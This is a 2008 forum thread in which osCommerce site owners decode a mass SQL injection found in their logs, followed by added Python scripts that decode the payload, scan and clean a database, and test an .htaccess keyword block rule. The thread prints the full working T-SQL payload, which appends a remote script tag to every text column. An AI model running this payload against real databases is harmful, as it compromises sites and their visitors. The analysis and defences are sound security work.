Maxwell Smart Posted August 16, 2008

I found a rather strange URL in my logs today:

/shop/?\';DeCLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C4043207661726368617228 3430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656 C65637420612E6E616D652C622E6E616D652066726F6D2073797

This was actually their landing page.
Maxwell Smart Posted August 16, 2008

Ok, so I've managed to figure out that's an SQL injection attack which translates to this:

DECLARE @T varchar(255),@C varchar(4000)
DECLARE Table_Cursor CURSOR FOR
    select a.name,b.name from sysobjects a,syscolumns b
    where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
    exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="hXXp://sdo.1000mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="hXXp://sdo.1000mg.cn/csrss/w.js"></script><!--''')
    FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor% AS% CHAR(@)

Now obviously I'm going to want to check my db for changes, but what would I be looking for?
Maxwell Smart Posted August 16, 2008

Apparently I should search Google before posting here... The following was taken from http://forum.joomla.org/viewtopic.php?f=43...375661#p1375966

This looks like MS SQL Server T-SQL and the tables it references don't exist in MySQL (which I assume is your back end database).

DECLARE @T varchar(255),@C varchar(4000)
--sets two variables to put your data in
DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
--sets up a cursor to read through all tables and all column names, i.e. it retrieves tablename/columnname pairs for all the tables in your data
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
--opens cursor and starts reading the rows one at a time
WHILE(@@FETCH_STATUS=0) BEGIN
--loop handling
exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="hXXp://sdo.1000mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="hXXp://sdo.1000mg.cn/csrss/w.js"></script><!--''')
--updates every column in every table to append a string to the existing data in the column.
--set ['+@C+']=['+@C+']+''"> pseudocode for this bit is "SET column_contents = column_contents plus something extra". The something extra looks like: "></title><script src="hXXp://sdo.1000mg.cn/csrss/w.js"></script><!--" (so everything after it will be commented out). He also avoids columns that he's already done.
FETCH NEXT FROM Table_Cursor INTO @T,@C
--get the next row and do it all again until loop is complete
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor% AS% CHAR(@)
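An added example, not from the thread or from osCommerce, that does the decoding step of the posts above as a reusable triage script: it pulls the hex literal out of the logged query string, decodes it the way the server's CAST(... AS CHAR) would, flags a log line that was cut mid-payload (odd number of hex digits, as in the excerpt above), and lists the script URL the decoded statement would append. The sample query string is the truncated one from the first post; the full-length payload is reconstructed from the decoded T-SQL in the second post, with the URL left defanged as the thread shows it. The UTF-16 branch is my own assumption about NVARCHAR variants of the same attack.

```python
"""Decode the hex-encoded T-SQL carried in a CAST(0x... AS CHAR(n)) injection."""
import re

# Constructed sample: the query string from the first post, with the hex
# payload broken across chunks exactly as the log excerpt in the thread shows it.
SAMPLE_QUERY_STRING = (
    "\\';DeCLARE @S CHAR(4000);SET @S=CAST(0x"
    "4445434C415245204054207661726368617228323535292C4043207661726368617228 "
    "3430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656 "
    "C65637420612E6E616D652C622E6E616D652066726F6D2073797"
)

# The string the decoded statement appends to every text column (URL defanged as in the thread).
INJECTED_TAIL = '"></title><script src="hXXp://sdo.1000mg.cn/csrss/w.js"></script><!--'

# Constructed: the complete statement as decoded in the second post, re-encoded
# to hex so the decoder can be exercised on a payload that was not cut short.
FULL_PAYLOAD_SQL = (
    "DECLARE @T varchar(255),@C varchar(4000) "
    "DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b "
    "where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) "
    "OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN "
    "exec('update ['+@T+'] set ['+@C+']=['+@C+']+''" + INJECTED_TAIL + "'' "
    "where '+@C+' not like ''%" + INJECTED_TAIL + "''') "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor"
)
FULL_PAYLOAD_HEX = FULL_PAYLOAD_SQL.encode("ascii").hex().upper()

# The hex literal inside CAST(0x...): the lookahead stops at the " AS CHAR(...)"
# that follows it, or at end of string when the log line was cut.
HEX_LITERAL_RE = re.compile(
    r"CAST\(\s*0x([0-9A-Fa-f\s]+?)(?=\s*(?:AS\b|\)|$))", re.IGNORECASE
)


def extract_hex(query_string):
    """Return the hex digits of the CAST(0x...) literal with whitespace removed, or None."""
    m = HEX_LITERAL_RE.search(query_string)
    return re.sub(r"\s+", "", m.group(1)) if m else None


def decode_payload(hex_digits):
    """Decode as the server's CAST would. Returns (text, truncated).

    truncated is True when the literal has an odd number of nibbles, which is
    what a log line cut mid-payload looks like; the dangling nibble is dropped.
    Assumption: NVARCHAR variants carry UTF-16LE, recognised here by the zero
    high byte of every ASCII character.
    """
    truncated = len(hex_digits) % 2 == 1
    if truncated:
        hex_digits = hex_digits[:-1]
    raw = bytes.fromhex(hex_digits)
    if len(raw) >= 4 and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16-le", errors="replace"), truncated
    return raw.decode("latin-1"), truncated


SCRIPT_SRC_RE = re.compile(r"""<script\s+src\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)


def injected_script_urls(sql):
    """Unique script URLs the decoded statement would append, in order of appearance."""
    seen = []
    for url in SCRIPT_SRC_RE.findall(sql):
        if url not in seen:
            seen.append(url)
    return seen


if __name__ == "__main__":
    text, cut = decode_payload(extract_hex(SAMPLE_QUERY_STRING))
    print(f"truncated={cut}: {text}")
    full, _ = decode_payload(FULL_PAYLOAD_HEX)
    print("script URLs:", injected_script_urls(full))
```

Run against the excerpt from the first post this yields the opening of the statement shown in the second post and reports the literal as truncated; the script URL is what you grep your own pages and tables for.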
praxyp Posted September 5, 2008

> I found a rather strange URL in my logs today:
> /shop/?\';DeCLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C4043207661726368617228 3430303029204445434C415245205461626C655F437572736F7220435552534F5220464F52207365 6 C65637420612E6E616D652C622E6E616D652066726F6D2073797
> This was actually their landing page.

My site was also hacked. Images were not being displayed when I entered "product_info.php". It turned out someone had updated the "store name" parameter in the admin to include text similar to the one you have got there. Unfortunately I forgot to copy it before I reset the parameter.

Let me know if you find any solution(s) to block this kind of intrusion.
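The second post asks what to look for in the database, and praxyp's reply shows one place it turned up: a configuration value rather than a product row. An added example, not from the thread or from osCommerce, of doing that check the same way the attack walks the catalogue: enumerate every character-typed column of every user table, count rows containing the script tag, and strip the exact injected string with REPLACE. It runs on an in-memory SQLite database whose tables are constructed here and only loosely modelled on osCommerce's configuration and products_description; on the real store the catalogue walk would use INFORMATION_SCHEMA.COLUMNS (MySQL) or sysobjects/syscolumns (MS SQL) and the UPDATE needs a backup first.

```python
"""Find and strip a string that a mass SQL injection appended to every text column."""
import sqlite3

# The tail the decoded payload appends (URL defanged as in the thread).
INJECTED_TAIL = '"></title><script src="hXXp://sdo.1000mg.cn/csrss/w.js"></script><!--'


def qi(identifier):
    """Quote an identifier read from the catalogue so odd names cannot break the SQL."""
    return '"' + identifier.replace('"', '""') + '"'


def like_escape(s):
    """Escape LIKE wildcards so the pattern matches the literal string only."""
    return s.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def text_columns(conn):
    """Yield (table, column) for every character-typed column of every user table.

    sqlite_master plus PRAGMA table_info stand in for the catalogue views the
    attack itself reads (sysobjects/syscolumns on MS SQL).
    """
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type='table' AND name NOT LIKE 'sqlite_%'")]
    for table in tables:
        for _cid, name, ctype, *_rest in conn.execute(f"PRAGMA table_info({qi(table)})"):
            if any(k in (ctype or "").upper() for k in ("CHAR", "TEXT", "CLOB")):
                yield table, name


def find_injected(conn, marker="<script src="):
    """Return [(table, column, row_count)] for every column holding the marker."""
    hits = []
    pattern = "%" + like_escape(marker) + "%"
    for table, column in text_columns(conn):
        sql = f"SELECT COUNT(*) FROM {qi(table)} WHERE {qi(column)} LIKE ? ESCAPE '\\'"
        n = conn.execute(sql, (pattern,)).fetchone()[0]
        if n:
            hits.append((table, column, n))
    return hits


def clean_injected(conn, injected):
    """Remove the exact injected string wherever it occurs; returns rows changed."""
    changed = 0
    pattern = "%" + like_escape(injected) + "%"
    for table, column in text_columns(conn):
        sql = (f"UPDATE {qi(table)} SET {qi(column)} = REPLACE({qi(column)}, ?, '') "
               f"WHERE {qi(column)} LIKE ? ESCAPE '\\'")
        changed += conn.execute(sql, (injected, pattern)).rowcount
    conn.commit()
    return changed


def build_sample_db():
    """Constructed in-memory schema, loosely modelled on osCommerce, with two poisoned cells."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE configuration (
            configuration_id INTEGER PRIMARY KEY,
            configuration_key VARCHAR(64),
            configuration_value VARCHAR(255));
        CREATE TABLE products_description (
            products_id INTEGER, products_name VARCHAR(64), products_description TEXT);
        CREATE TABLE orders_total (orders_id INTEGER, value DECIMAL(15,4));
    """)
    conn.executemany("INSERT INTO configuration VALUES (?,?,?)", [
        (1, "STORE_NAME", "Maxwell's Shop" + INJECTED_TAIL),   # what praxyp found
        (2, "STORE_OWNER", "Maxwell Smart"),
    ])
    conn.executemany("INSERT INTO products_description VALUES (?,?,?)", [
        (31, "Shoe phone", "Voice only." + INJECTED_TAIL),
        (32, "Cone of silence", "Clean description."),
    ])
    conn.execute("INSERT INTO orders_total VALUES (1, 99.95)")
    conn.commit()
    return conn


if __name__ == "__main__":
    db = build_sample_db()
    print("before:", find_injected(db))
    print("rows cleaned:", clean_injected(db, INJECTED_TAIL))
    print("after:", find_injected(db))
```

The scan keys on `<script src=` because the payload's own WHERE clause guarantees each cell carries the tag at most once; the cleanup removes the exact string the decoder recovered, so a shorter or differently defanged marker must not be passed to clean_injected.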
spooks Posted September 5, 2008

http://www.oscommerce.com/forums/index.php?showtopic=313323

Sam
Guest Posted September 6, 2008

I got hammered by this 10 times over recently. Adding this to .htaccess:

RewriteCond %{QUERY_STRING} [^a-z](declare|char|set|cast|convert|delete|drop|exec|meta|script|select|truncate)[^a-z] [NC]
RewriteRule (.*) - [F,L]

should make it stop appearing in your logs... it'll give them a 500 error instead of a 404 or 200 response (once you serve these twits a proper error they tend to buzz off).
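An added example, not from the thread, that replays the RewriteCond above against constructed access-log lines before anyone puts it in production: the pattern matches bare words, so it catches the payload but also any ordinary parameter called `set`, `char`, `meta` and so on, while word boundaries save `charset`. A tighter alternative that keys on the shape of this payload (`declare @`, `cast(0x...`, `exec(`) is my own suggestion; it is written in Python's re but uses only constructs PCRE shares, and it allows for the `%20` or `+` that whitespace becomes in a raw query string. One factual note on the post: Apache's F flag answers 403 Forbidden, not 500.

```python
"""Replay the .htaccess keyword filter from the post against sample access-log lines."""
import re

# The RewriteCond pattern from the post as a Python regex; Apache's [NC] is re.IGNORECASE.
HTACCESS_PATTERN = re.compile(
    r"[^a-z](declare|char|set|cast|convert|delete|drop|exec|meta|script|select|truncate)[^a-z]",
    re.IGNORECASE,
)

# Added, tighter alternative (my assumption, not from the thread): match the payload's
# shape rather than bare words. Query strings arrive still URL-encoded, so a space
# may appear as %20 or '+'.
SP = r"(?:\s|%20|\+)*"
TIGHTER_PATTERN = re.compile(
    rf"declare{SP}@|cast{SP}\({SP}0x[0-9a-f]{{8,}}|exec{SP}\(",
    re.IGNORECASE,
)

# Constructed log lines in Apache combined format: the first is the hit from the
# thread (payload shortened), the rest are ordinary osCommerce-style requests.
LOG_LINES = [
    "203.0.113.9 - - [16/Aug/2008:03:14:07 +0000] \"GET /shop/?\\';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C HTTP/1.1\" 200 5123",
    "198.51.100.4 - - [16/Aug/2008:03:15:22 +0000] \"GET /shop/product_info.php?products_id=31 HTTP/1.1\" 200 8891",
    "198.51.100.4 - - [16/Aug/2008:03:15:40 +0000] \"GET /shop/index.php?page=2&set=grid HTTP/1.1\" 200 7710",
    "198.51.100.7 - - [16/Aug/2008:03:16:02 +0000] \"GET /shop/index.php?cPath=21&charset=utf-8 HTTP/1.1\" 200 7702",
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) \S*?\?(\S*) HTTP/')


def query_string(log_line):
    """Return the raw query string of a combined-format log line, '' when there is none."""
    m = REQUEST_RE.search(log_line)
    return m.group(1) if m else ""


def would_block(qs, pattern=HTACCESS_PATTERN):
    """True when the RewriteCond would fire on this query string."""
    return pattern.search(qs) is not None


def triage(log_lines, pattern=HTACCESS_PATTERN):
    """Return [(line_number, query_string, blocked)] for every line."""
    return [(i + 1, query_string(line), would_block(query_string(line), pattern))
            for i, line in enumerate(log_lines)]


if __name__ == "__main__":
    for name, pat in (("post's pattern", HTACCESS_PATTERN), ("tighter pattern", TIGHTER_PATTERN)):
        print(name)
        for n, qs, blocked in triage(LOG_LINES, pat):
            print(f"  line {n}: {'BLOCK' if blocked else 'pass '}  {qs[:60]}")
```

Line 3 (`page=2&set=grid`) is the false positive to watch for: a legitimate visitor gets the 403 as surely as the bot does. Replaying a day of real logs through `triage` before deploying a rule shows how much traffic it would turn away.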